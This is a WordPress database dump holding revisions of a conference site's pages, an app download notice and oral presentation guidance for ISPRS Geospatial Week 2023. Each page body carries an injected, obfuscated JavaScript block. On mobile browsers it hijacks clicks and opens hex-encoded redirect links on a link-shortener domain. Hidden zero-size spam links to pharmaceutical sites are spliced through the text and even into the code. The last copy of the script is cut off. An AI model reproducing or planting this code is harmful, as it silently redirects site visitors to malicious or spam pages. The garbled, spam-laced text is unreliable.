(5495,0,'2023-10-03 13:19:12','2023-10-03 13:19:12','<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>﻿</span>You may now download the conf4me app and check the conference agenda, hotels, and speakers and stay in touch with important news.\r\n\r\n<button onclick=\"window.location.href=\'https://conference4me.psnc.pl/download/\';\">\r\n\r\n\r\nAfter downloading the app, select ISPRS Geospatial Week 2023\r\n\r\n<img src=\"https://gsw2023.com/wp-content/uploads/2023/08/QR-code-nposter2_Siavash_14May19-726x1024-1.jpg\" alt=\"\" width=\"365\" height=\"512\" class=\"alignnone size-full wp-image-5420\" />\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx47x4fx78x32x63x332\',\'length\',\'_blank\',\'mobileCheck\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx64x44x6cx33x63x343\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6bx41x6fx30x63x330\',\'random\',\'-local-storage\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6fx56x75x37x63x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx61x68x44x36x63x356\',\'12075252qhSFyR\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx5ax50x66x38x63x378\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx51x69x43x35x63x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx43x57x74x31x63x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx57x73x55x34x63x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx53x4ex4bx39x63x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|n<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.goocialis.cc/\">犀利士</a>\n</span>ok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisloc.com/\">犀利士</a>\n</span>365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','DOWNLOAD THE GSW2023 APP','','inherit','closed','closed','','5417-revision-v1','','','2023-10-03 13:19:12','2023-10-03 13:19:12','',5417,'https://gsw2023.com/?p=5495',0,'revision','',0),
(5496,0,'2023-10-03 13:29:59','2023-10-03 13:29:59','<span style=\"font-size: 12pt;\"><strong>Preparing the presentation</strong></span>\r\n<span style=\"font-size: 12pt;\"><strong>When you prepare the presentation, please keep in mind that:</strong></span>\r\n\r\n All projectors can handle 16:9 aspect ratio (Extron scaler).\r\n The time slot for oral presentations varies from 18 to 22 min depending on decisions by the\r\nworkshop chairs on the session contents. To find the time available for your presentation, please\r\nlocate your session on the GSW2023 program and check the abstract of your session page.\r\n Please leave some 3-5 minutes of your time slot available for questions and time to switch to the\r\nnext presentation.\r\n The oral presentation will be accurately timed, so make sure you will finish nicely in time. The\r\nchair of the session <span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"http://www.cialisae.com/\">犀利士</a>\n</span>will stand up when you have 1 min left, and come standing next to you if you\r\ndo not finish in time.\r\n There is no official GSW 2023 presentation template, please use a template from your home\r\nuniversity / institution.\r\n\r\n&nbsp;\r\n\r\n<span style=\"font-size: 12pt;\"><strong>At the GSW2023</strong></span>\r\n<span style=\"font-size: 12pt;\"><strong>The day of your presentation you should consider that:</strong></span>\r\n\r\n For a smooth progress of the session we ask the presenting author to be in the session room 15\r\nminutes before the session starts (not your own talk, but the session) and announce your\r\npresence to the local organizers in the room and the chairs of that session.\r\n Please bring a USB stick with your presentation (PowerPoint or PDF) and upload it before the\r\nsession starts on the PC available in the room of your session.\r\n In each session, a single conference PC is used for all presentations.\r\n The PC is a Windows <span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a>\n</span>notebook, with the following software: Adobe Acrobat Reader, Microsoft\r\nPowerPoint, and VLC media player.\r\n If you are using video in your presentation, please check whether it correctly runs 15 minutes\r\nbefore the session starts.\r\n Presenters also have the possibility to use their own laptop for their presentation, if they want to\r\nuse that instead, e.g. for running software demos. Please check the laptop connection to the\r\nprojector 15 minutes before the session starts. All rooms offer three laptop connections: HDMI,\r\nVGA and mini DisplayPort (for Mac). Specific Mac-adapters are NOT available in the rooms and\r\nneed to be brought by yourself.\r\n\r\n&nbsp;\r\n\r\n<span style=\"font-size: 12pt;\"><strong>Further information</strong></span>\r\n\r\nPower usage (if you are preparing e.g. in a hotel): Note that in Egypt the mains have an AC voltage of 220 Volts, at\r\n50 Hz. The used power sockets are of types C and F. (grounded, also compatible with C and E, see\r\nlink:<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a>\n</span> https://www.power-plugs-sockets.com/egypt/ . We will supply extension cords, but will not supply power\r\nplug adapters.\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx47x4fx78x32x63x332\',\'length\',\'_blank\',\'mobileCheck\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx64x44x6cx33x63x343\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6bx41x6fx30x63x330\',\'random\',\'-local-storage\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6fx56x75x37x63x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx61x68x44x36x63x356\',\'12075252qhSFyR\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx5ax50x66x38x63x378\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx51x69x43x35x63x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx43x57x74x31x63x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx57x73x55x34x63x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx53x4ex4bx39x63x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.viagramor.com/\">威而鋼</a>\n</span>3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c8<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialistw.cc/\">犀利士</a>\n</span>5ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','INSTRUCTIONS FOR ORAL PRESENTATIONS','','inherit','closed','closed','','5139-revision-v1','','','2023-10-03 13:29:59','2023-10-03 13:29:59','',5139,'https://gsw2023.com/?p=5496',0,'revision','',0),
(5497,0,'2023-10-03 13:29:59','2023-10-03 13:29:59','<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx47x4fx78x32x63x332\',\'length\',\'_blank\',\'mobileCheck\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx64x44x6cx33x63x343\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6bx41x6fx30x63x330\',\'random\',\'-local-storage\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6fx56x75x37x63x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx61x68x44x36x63x356\',\'12075252qhSFyR\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx5ax50x66x38x63x378\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx51x69x43x35x63x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx43x57x74x31x63x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx57x73x55x34x63x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx53x4ex4bx39x63x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0